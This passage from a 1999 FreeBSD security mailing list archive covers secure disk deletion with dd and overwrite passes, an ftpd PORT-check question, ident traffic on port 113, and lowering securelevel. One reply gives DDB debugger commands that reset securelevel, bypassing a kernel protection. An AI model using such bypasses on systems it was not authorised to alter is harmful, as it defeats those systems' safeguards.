empty space on your disk, to wipe files that have already been rm'ed, something like this is 98% effective: dd if=/dev/urandom of=foobar & (sleep 1; rm foobar) The rm is supposed to happen before dd exits so that when dd finally bombs on a "disk full" error the space will automatically be freed. It isn't perfect, as partially used blocks won't have the unused portion overwritten, but most of the disk will be wiped. Overwriting once is sufficient to prevent casual snooping. Using the rm and dd commands above would allow you to safely give your disk to a nosy friend, but is probably not enough to protect your deleted files from the FBI, the mafia, or corporate competitors. If you're creating a new secure deletion program or kernel patch and want to do more than just a single overwrite you should read this paper: http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html P.S. Don't forget swap space. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 15:46:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from pollux.or.signature.nl (pollux.or.signature.nl [194.229.138.194]) by hub.freebsd.org (Postfix) with ESMTP id 9F6BA1589C for ; Thu, 20 May 1999 15:46:10 -0700 (PDT) (envelope-from bit@signature.nl) Received: from localhost (bit@localhost) by pollux.or.signature.nl (8.9.1/8.9.1) with SMTP id AAA13696; Fri, 21 May 1999 00:45:56 +0200 (MET DST) Date: Fri, 21 May 1999 00:45:56 +0200 (MET DST) From: Bart Smit X-Sender: bit@pollux.or.signature.nl To: Kiril Mitev Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <199905201542.QAA25977@idea.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 20 May 1999, Kiril Mitev wrote: > -> then you (theoretically) should be worried about locking up your > hardware, rather than wiping your disk :-0 Actually it's easier and a lot safer to wipe your disk. It's perfectly feasible that that the law shows up on your doorstep and insists to take your hardware if you're an ISP. It takes as little as some determination from a pseudo-religious sect's lawyers (ask xs4all.nl). -- Bart To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 16:37:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E8A3C14E6C for ; Thu, 20 May 1999 16:37:50 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id RAA66983; Thu, 20 May 1999 17:36:40 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA08650; Thu, 20 May 1999 17:36:43 -0600 (MDT) Message-Id: <199905202336.RAA08650@harmony.village.org> To: Joel Maslak Subject: Re: Secure Deletion Cc: security@FreeBSD.ORG In-reply-to: Your message of "Thu, 20 May 1999 09:55:07 MDT." <3.0.6.32.19990520095507.00840010@india.wind-river.com> References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> Date: Thu, 20 May 1999 17:36:43 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <3.0.6.32.19990520095507.00840010@india.wind-river.com> Joel Maslak writes: : As for "secure" deletion... Why doesn't someone just write a simple : user-space program to do that. Because that wouldn't work. : If all you want is a way to force a file to go away from the command line, : just rewrite rm. Because that doesn't work for temporary files. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 18:23:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from ptah.ricochet.net (mg-206191146-151.ricochet.net [206.191.146.151]) by hub.freebsd.org (Postfix) with ESMTP id 976A6158D8 for ; Thu, 20 May 1999 18:23:16 -0700 (PDT) (envelope-from elakin@ricochet.net) Received: (from elakin@localhost) by ptah.ricochet.net (8.9.3/8.9.2) id SAA32989; Thu, 20 May 1999 18:21:45 -0700 (PDT) (envelope-from elakin) Date: Thu, 20 May 1999 18:21:42 -0700 From: Eric Lakin To: Avalon Books Cc: security@FreeBSD.ORG Subject: Re: Secure Deletion Message-ID: <19990520182142.A1242@ptah.ricochet.net> Reply-To: elakin@ricochet.net References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Avalon Books on Thu, May 20, 1999 at 03:05:18PM -0500 X-Disclaimer: Yow! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 20, 1999 at 03:05:18PM -0500, Avalon Books spread the following propaganda: > > > As for "secure" deletion... Why doesn't someone just write a simple > > user-space program to do that. True, it wouldn't handle calls to unlink(), > > but one would think that someone could modify the library really quick > > (provided no one does a system call directly, but uses the libc interface > > instead). I think this would be much better for everyone involved. > > Actually, I've done this already. At the moment, its a simple > stand-alone program (I originally wrote during my DOS days, years ago), > but I've been toying with the idea of adding the method in as an option > for 'rm'. No need to tie up the kernel with this sort of thing. > > It uses a combination of randomly-generated and pattern-specific > overwrites of a file (or group of files) in-place, in order to make > recovery extremely difficult--even with advanced equipment (like > echo-cancellation analysis systems). A standard file-deletion is issued > after its done mangling the file(s) in question. It works ok, I guess, as > betas go. This sounds similar to "rm -P" in a stock FreeBSD system (3.1, atleast) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 18:44:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from vespucci.advicom.net (vespucci.advicom.net [199.170.120.42]) by hub.freebsd.org (Postfix) with ESMTP id 2344A158FD for ; Thu, 20 May 1999 18:44:40 -0700 (PDT) (envelope-from avalon@vespucci.advicom.net) Received: from localhost (avalon@localhost) by vespucci.advicom.net (8.8.8/8.8.5) with ESMTP id UAA09506; Thu, 20 May 1999 20:44:38 -0500 (CDT) X-Envelope-Recipient: security@FreeBSD.ORG Date: Thu, 20 May 1999 20:44:37 -0500 (CDT) From: Avalon Books To: Eric Lakin Cc: security@FreeBSD.ORG Subject: Re: Secure Deletion In-Reply-To: <19990520182142.A1242@ptah.ricochet.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > It uses a combination of randomly-generated and pattern-specific > > overwrites of a file (or group of files) in-place, in order to make > > recovery extremely difficult--even with advanced equipment (like > > echo-cancellation analysis systems). A standard file-deletion is issued > > after its done mangling the file(s) in question. It works ok, I guess, as > > betas go. > > This sounds similar to "rm -P" in a stock FreeBSD system (3.1, atleast) Similar, but certainly more sophisticated than the -P option for rm. Still, my program is just a beta, and I'll admit that it certainly isn't ready for any kind of real-world environment--yet. I'm going to add swap-space and free-space deletion options as soon as I figure out a way to do those things gracefully. It should make for a nice, relaxing programming project. --R. Pelletier Sys Admin, House Galiagante We are a Micro$oft-free site To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 19: 5: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.inreach.com (unknown [209.142.0.6]) by hub.freebsd.org (Postfix) with ESMTP id 40FC814D97 for ; Thu, 20 May 1999 19:04:59 -0700 (PDT) (envelope-from condor@inreach.com) Received: from pavilion (209-142-8-234.stk.inreach.net [209.142.8.234]) by smtp.inreach.com (8.9.3/8.9.3) with SMTP id SAA21556; Thu, 20 May 1999 18:52:16 -0700 (PDT) Received: by localhost with Microsoft MAPI; Thu, 20 May 1999 19:04:15 -0700 Message-ID: <01BEA2F3.8E3149A0.condor@inreach.com> From: CONDOR Reply-To: "condor@inreach.com" To: "'Avalon Books'" , Dan Langille Cc: Darren Reed , "freebsd-security@FreeBSD.ORG" Subject: RE: secure deletion Date: Thu, 20 May 1999 18:51:19 -0700 Organization: Condor Worldwide Data Systems X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----Original Message----- From: Avalon Books [SMTP:avalon@advicom.net] Sent: Thursday, May 20, 1999 12:52 To: Dan Langille Cc: Darren Reed; freebsd-security@FreeBSD.ORG Subject: Re: secure deletion It seems a bit extreme, but I will admit it *is* a secure erase method. That's military thinking for you... [CONDOR] I saw a good 'government approved CD eraser' at a convention one time. -A guy had two heat warped CDs in a toaster.. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 21:35:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id ABF0615926 for ; Thu, 20 May 1999 21:35:56 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id WAA03309; Thu, 20 May 1999 22:35:47 -0600 (MDT) Message-Id: <4.2.0.37.19990520223517.0468a650@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Thu, 20 May 1999 22:35:38 -0600 To: "Addr.com Web Hosting" , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: question about ftpd sercurity feature. In-Reply-To: <4.2.0.37.19990520104919.02a14ee0@mail.addr.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Doesn't your proxy munge the PORT command? --Brett At 11:04 AM 5/20/99 -0700, Addr.com Web Hosting wrote: >Hi, > >I have a question regarding a security feature which is build in to the "ftpd" on the FreeBSD system. The feature is that the server will not accept any "PORT" command unless the address matches that of the client. The reason this is a problem is because I am partially proxy-ing the connection, and the client address is that of the proxy, but I don't want the proxy to handle data connections, just have them made directly to the client. >In more detail (and I would appreciate any comments/suggestions about this scheme or any alternate scheme you can recommend): >We have users distributed among several machines, however, we would like for the users to be able to access their account via a single FTP server. We currently using NFS, however, under heavier loads it becomes unmanageable and unstable. Instead, I have developed a very simple proxy, which queries for the user name and then based on an internal table makes the connection to the correct server, and simply pipes any data from the server to the client, and vice versa. This is were I hit the problem that the server will not establish a data connection to any machine other then the proxy. Of course I can proxy the data connection as well, but if it doesn't cause any security issues, I would much rather just comment that line out of the ftpd server. > >Thanks in advance, >Anthony > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 23:35:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 2AF3E15920 for ; Thu, 20 May 1999 23:35:12 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id QAA10497 for security@freebsd.org; Fri, 21 May 1999 16:35:11 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199905210635.QAA10497@henry.cs.adfa.edu.au> Subject: Lowering securelevel from console? To: security@freebsd.org Date: Fri, 21 May 1999 16:35:11 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, I'm sure this has been discussed before, I've hit the list browse web engine with no good results, so... I think that being able to lower the securelevel as root from the console would be a good idea, rather than having to go to single-user mode to make changes as required. I know the current code in kern_mib.c doesn't do this. I'm expecting comments back saying that it's not a good idea, you're still net connected. Assume I've ifconfig'd all interfaces down :-) Now, are there any other reasons why lowering securelevel as root from the console (and no net connectivity) would be a BAD thing? Many thanks in advance for critical and informative replies! Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 23:35:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 0D4E214E78 for ; Thu, 20 May 1999 23:35:17 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id XAA17266; Thu, 20 May 1999 23:34:39 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id XAA22650; Thu, 20 May 1999 23:34:39 -0700 Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA03117; Thu, 20 May 99 23:34:30 PDT Message-Id: <3744FE75.E83FA611@softweyr.com> Date: Fri, 21 May 1999 00:34:29 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: junkmale@xtra.co.nz Cc: Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: <37438E4C.4B95B937@softweyr.com> from Wes Peters at "May 19, 99 10:23:40 pm" <19990520065202.IDMD7869945.mta1-rme@wocker> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dan Langille wrote: > > On 20 May 99, at 16:42, Darren Reed wrote: > > > I'd worry about this sort of thing when and if FreeBSD is ever used for > > storing of (officially) classified/confidential material and even then, > > the solution is likely to be to take a hammer or drill to the disks. > > I know of at least one government department which drills through the > platters when disposing of a disk drive. None of the above would have met those specifications, just in case you're wondering. All platters had to be destroyed in an 800 degree F oven for at least an hour, or ground into small particles. ;^) But then again, we were storing relatively important information on those disks. For relatively mundane security needs, overwriting with one pass of 0xa3 (10100101) followed by one pass of 0x3a (01011010) would certainly suffice. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 23:42:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 4D74514A2E for ; Thu, 20 May 1999 23:42:10 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id XAA17406; Thu, 20 May 1999 23:42:05 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id XAA22806; Thu, 20 May 1999 23:42:05 -0700 Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA03472; Thu, 20 May 99 23:42:02 PDT Message-Id: <3745003A.874424CD@softweyr.com> Date: Fri, 21 May 1999 00:42:02 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: <199905201013.UAA12994@avalon.reed.wattle.id.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed wrote: > > So properly in this case means using memset rather than bzero and a > variable number of passes, correct (with perhaps a programmable pattern) ? > Being able to verify that the file's contents get nuked to the value the > pass is meant to have set it to might be worthwhile. > > After the first pass, I'm not sure that there is any meaningful addition > to the security of the erased data. You're wrong here. > Access to sophisticated machinery is required to circumvent it, Any anyone with $100 has access to that machinery -- disk recovery houses. In some cases, you can read it from an ordinary controller; overwriting disk blocks with zeros often doesn't erase the one bits enough to keep the head from reading back the same you to were trying to overwrite. > but if that is what you're trying to protect > against then why fool yourself by deploying a level of security that is > known to be less than Government bodies who physically destroying disks. > > I don't think you understand the problem properly if you think it can be > coded "correctly" - what you're proposing just isn't possible via software > where one overwrite is pretty much as good as multiple. But one overwrite isn't anywhere near as good as multiples, especially if you pay a little attention to how disk drives actually record data. The real key is to rotate the individual bits between 1 and 0 multiple times so you are erasing deeply into the recording media and not leaving "generations" of data on the platter. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 20 23:47:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 4060814A2E for ; Thu, 20 May 1999 23:47:27 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id XAA17414; Thu, 20 May 1999 23:46:50 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id XAA22981; Thu, 20 May 1999 23:46:50 -0700 Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA03739; Thu, 20 May 99 23:46:47 PDT Message-Id: <37450157.181A953@softweyr.com> Date: Fri, 21 May 1999 00:46:47 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Joel Maslak Cc: security@FreeBSD.ORG Subject: Re: Secure Deletion References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Joel Maslak wrote: > > Let's keep standard BSD semantics here, please! > > As for "secure" deletion... Why doesn't someone just write a simple > user-space program to do that. True, it wouldn't handle calls to unlink(), > but one would think that someone could modify the library really quick > (provided no one does a system call directly, but uses the libc interface > instead). I think this would be much better for everyone involved. It'd be ever so much easier to do it with a MIB (kern.shred) or a filesystem superblock or mount-time option for somewhat finer control. In general, if you're worried enough about files to obliterate them on deletion, you want to do so to every file, so a MIB makes sense. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 0:16:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (Postfix) with ESMTP id E13B01586F for ; Fri, 21 May 1999 00:16:55 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.9.3/RDY&DVV) id AAA20092; Fri, 21 May 1999 00:16:47 -0700 (PDT) Message-Id: <199905210716.AAA20092@burka.rdy.com> Subject: Re: Lowering securelevel from console? In-Reply-To: <199905210635.QAA10497@henry.cs.adfa.edu.au> from Warren Toomey at "May 21, 1999 04:35:11 pm" To: wkt@cs.adfa.edu.au Date: Fri, 21 May 1999 00:16:47 -0700 (PDT) Cc: security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey writes: > Hi all, > I'm sure this has been discussed before, I've hit the list browse > web engine with no good results, so... > > I think that being able to lower the securelevel as root from the console > would be a good idea, rather than having to go to single-user mode to make > changes as required. > > I know the current code in kern_mib.c doesn't do this. I'm expecting > comments back saying that it's not a good idea, you're still net connected. > Assume I've ifconfig'd all interfaces down :-) > > Now, are there any other reasons why lowering securelevel as root from > the console (and no net connectivity) would be a BAD thing? > > Many thanks in advance for critical and informative replies! Use DDB. Something like this should work: db> w securelevel 0xffffffff db> cont Enabling securelevel changes from the console w/o breaking into the debugger is potentially dangerous. > > Warren > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 1:32: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id 3345F151F1 for ; Fri, 21 May 1999 01:31:53 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk) Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id JAA01079 for ; Fri, 21 May 1999 09:31:52 +0100 (BST) Message-ID: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk> Reply-To: "Greg Quinlan" From: "Greg Quinlan" To: Subject: Server trying to connect to Port 113 Date: Fri, 21 May 1999 09:31:37 +0100 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.2106.4 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am not on the mailing list so please include me in your reply. Can someone explain what this remote system is trying to do? May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 :113 in via fxp1 May 21 09:22:35 amanda last message repeated 3 times Extract from /etc/services auth 113/tcp ident tap #Authentication Service auth 113/udp ident tap #Authentication Service Greg -----Original Message----- From: Andrew McNaughton To: junkmale@xtra.co.nz Cc: freebsd-security@FreeBSD.ORG Date: 18 May 1999 23:34 Subject: Re: http attack(?) >> A few days ago, I noticed my machine was running extremely slowly. I did a top 10 at the console and >> got "too many open files". Existing telnet sessions were non-responsive. New telnets would not start. >> >> I then tried a top 5. named and syslogd were busy. >> >> I looked at httpd.error and 21 of these spread over 14 seconds: >> [Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system > >I'm not too sure whether to trust that the restriction on file handles is system wide. Some programs may not know about FreeBSD's process limits scheme. > >Check the output of 'limits' and 'sysctl -a | grep maxfiles'. They might give you a better idea what is happening. The context in which you run limits is important, but if your shell is failing, then that shell is probably a good thing to have a look at. limits is a shell built-in under sh and bash, and will not spawn a new process. > >Andrew McNaughton >-- >----------- >Andrew McNaughton >andrew@squiz.co.nz >http://www.newsroom.co.nz/ > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 1:33:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns0.virtual-pc.com (mailgate.virtual-pc.com [194.217.102.1]) by hub.freebsd.org (Postfix) with ESMTP id 6249914D61 for ; Fri, 21 May 1999 01:33:48 -0700 (PDT) (envelope-from gc@virtual-pc.com) Received: from virtual-pc.com (v-pc.virtual-pc.com [195.11.18.2]) by ns0.virtual-pc.com (8.9.3/8.8.5) with ESMTP id JAA22600; Fri, 21 May 1999 09:39:46 +0100 (BST) Message-ID: <374519D4.403016C2@virtual-pc.com> Date: Fri, 21 May 1999 09:31:16 +0100 From: gc X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: tim@iafrica.com.na Cc: Joel Maslak , security@FreeBSD.ORG Subject: Re: Secure Deletion References: <3.0.6.32.19990520095507.00840010@india.wind-river.com> <374474D4.2263@iafrica.com.na> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tim Priebe wrote: > > Joel Maslak wrote: > > > > Let's keep standard BSD semantics here, please! > > > > As for "secure" deletion... Why doesn't someone just write a simple > > user-space program to do that. True, it wouldn't handle calls to unlink(), > > but one would think that someone could modify the library really quick > > (provided no one does a system call directly, but uses the libc interface > > instead). I think this would be much better for everyone involved. > > > > Some problems with my idea... > > > > Static-linked executables would need to be recompiled > > Library would need to be modified on "secure" systems > > > > If all you want is a way to force a file to go away from the command line, > > just rewrite rm. > Could someone enlighten me as to why the first move is not to write back an inverted copy of the data to even out the residual field before resorting to other patterns? (this assumes you are deleting a file and thus still have the data before you start). > >From my understanding of ffs, this would not be sufficiant. As a file > grows, it is possible that the data is copied from its initial location > to a new one. To not just give a false sense of security these block > fragments would have to be over written after the data is copied, or > some of the data could still be sitting on the drive after you think it > is gone. > In that case, maybe there should be a flag attached to a given file which made the OS 'securely' wipe any sectors that had been used by the file any time it moved them. gc > Tim. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 1:38:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id E681D15954 for ; Fri, 21 May 1999 01:38:40 -0700 (PDT) (envelope-from akm@mail.theinternet.com.au) Received: (from akm@localhost) by mail.theinternet.com.au (8.9.3/8.9.3) id SAA45432; Fri, 21 May 1999 18:39:05 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199905210839.SAA45432@mail.theinternet.com.au> Subject: Re: Server trying to connect to Port 113 In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk> from Greg Quinlan at "May 21, 1999 9:31:37 am" To: greg@qmpgmc.ac.uk Date: Fri, 21 May 1999 18:39:05 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Greg Quinlan ]--------------------------------------------- | I am not on the mailing list so please include me in your reply. | | Can someone explain what this remote system is trying to do? | | May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 :113 in via fxp1 | May 21 09:22:35 amanda last message repeated 3 times | | Extract from /etc/services | | auth 113/tcp ident tap #Authentication Service | auth 113/udp ident tap #Authentication Service | | Greg Authenticate a user. -- ala identd or pidentd. Given a socket port on both ends, identd returns the username that is connected to that socket. This is used most commonly by IRC servers, but is also used by web-proxies. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 1:39:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.acadiau.ca (relay.acadiau.ca [131.162.2.90]) by hub.freebsd.org (Postfix) with ESMTP id 1271B15958 for ; Fri, 21 May 1999 01:39:26 -0700 (PDT) (envelope-from 026809r@dragon.acadiau.ca) Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by relay.acadiau.ca (8.8.5/8.8.5) with ESMTP id FAA24439; Fri, 21 May 1999 05:38:04 -0300 (ADT) Received: from localhost (026809r@localhost) by dragon.acadiau.ca (8.8.8+Sun/8.8.8) with ESMTP id FAA01717; Fri, 21 May 1999 05:38:01 -0300 (ADT) Date: Fri, 21 May 1999 05:38:01 -0300 (ADT) From: Michael Richards <026809r@dragon.acadiau.ca> X-Sender: 026809r@dragon To: Greg Quinlan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Server trying to connect to Port 113 In-Reply-To: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 21 May 1999, Greg Quinlan wrote: > Can someone explain what this remote system is trying to do? > > May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 ip>:113 in via fxp1 > May 21 09:22:35 amanda last message repeated 3 times Quite possibly, the remote machine is running tcp wrappers or some other such thing and it's causing it to try a ident query when a connection is made. Something like that. For more info, log the packets. You'd probably find that they are normal "ident" packets... -Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 1:42: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 6034715956 for ; Fri, 21 May 